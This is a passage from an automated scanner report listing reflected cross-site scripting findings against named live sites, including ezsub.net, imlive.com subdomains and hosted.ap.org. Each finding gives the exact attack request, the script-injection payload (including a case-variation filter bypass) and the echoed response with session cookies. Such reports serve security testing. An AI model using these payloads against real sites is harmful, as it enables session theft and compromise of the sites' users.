HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Web Ca
...[SNIP]...
<BR>
ERROR: Web Page is corrupted! Wrong PUBID=5861D459<SCRIPT>ALERT(1)</SCRIPT>FB57B35142C.<BR>
...[SNIP]...

4.438. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cf9"><script>alert(1)</script>2780b4f0119 was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XXa3cf9"><script>alert(1)</script>2780b4f0119&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="SBTYPE" value="XXA3CF9"><SCRIPT>ALERT(1)</SCRIPT>2780B4F0119">
...[SNIP]...

4.439. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87eb7"><script>alert(1)</script>1275777e30 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET87eb7"><script>alert(1)</script>1275777e30&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="SOURCE" value="INET87EB7"><SCRIPT>ALERT(1)</SCRIPT>1275777E30">
...[SNIP]...

4.440. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 4972f<script>alert(1)</script>d2f01f95955 was submitted in the jt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc4972f<script>alert(1)</script>d2f01f95955&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-Type: text/html

<html><body><h1>FOXISAPI call failed</h1><p><b>Progid is:</b> main.sv
<p><b>Method is:</b> run
<p><b>Parameters are:</b> jt=starr_wc4972f<script>alert(1)</script>d2f01f95955&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
<p>
...[SNIP]...

4.441. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions, for example by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1a5e720-2007-4ea7-a708-9070c86d04f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 19737
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||2a9d8"><script>alert(1)</script>bf56a35d647~1');return false;">
...[SNIP]...

4.442. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:19 GMT
Connection: close
Content-Length: 19336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.443. http://fr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=fr.imlive.com&ul=/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://fr.imlive.com:80/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.444. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: spvdr=vd=47dec44d-298a-4e64-82a7-f991aeebff7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:21 GMT
Connection: close
Content-Length: 21274
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/?2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&iy=dallas&id=44&iu=1&vd=47dec44d-298a-4e64-82a7-f991aeebff7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.445. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=b549c441-750e-4a3f-9af7-09b50e1c51fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 21675
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;">
...[SNIP]...

4.446. http://gr.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:31 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.447. http://gr.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:35 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.448. http://gr.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the input lands inside a single-quoted attribute of an img tag, the PoC closes the attribute and adds an onerror event handler, which is what introduces the JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:31 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=gr.imlive.com&ul=/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://gr.imlive.com:80/waccess/2d7c5'onerror='alert(1)'1cb395fc54c/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.449. http://gr.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:26 GMT
Connection: close
Content-Length: 24865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.450. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the CN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18784"%3balert(1)//b6df280b1f1 was submitted in the CN parameter. This input was echoed as 18784";alert(1)//b6df280b1f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP70718784"%3balert(1)//b6df280b1f1&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<script type="text/javascript">

var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP70718784";alert(1)//b6df280b1f1&amp;Idx=2&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE";

function SetPage(lastNum, action)
{

   document.frmSort.action = apLink;
   document.frmSort.method = "Post";

   var firstRecN = 0;

   var
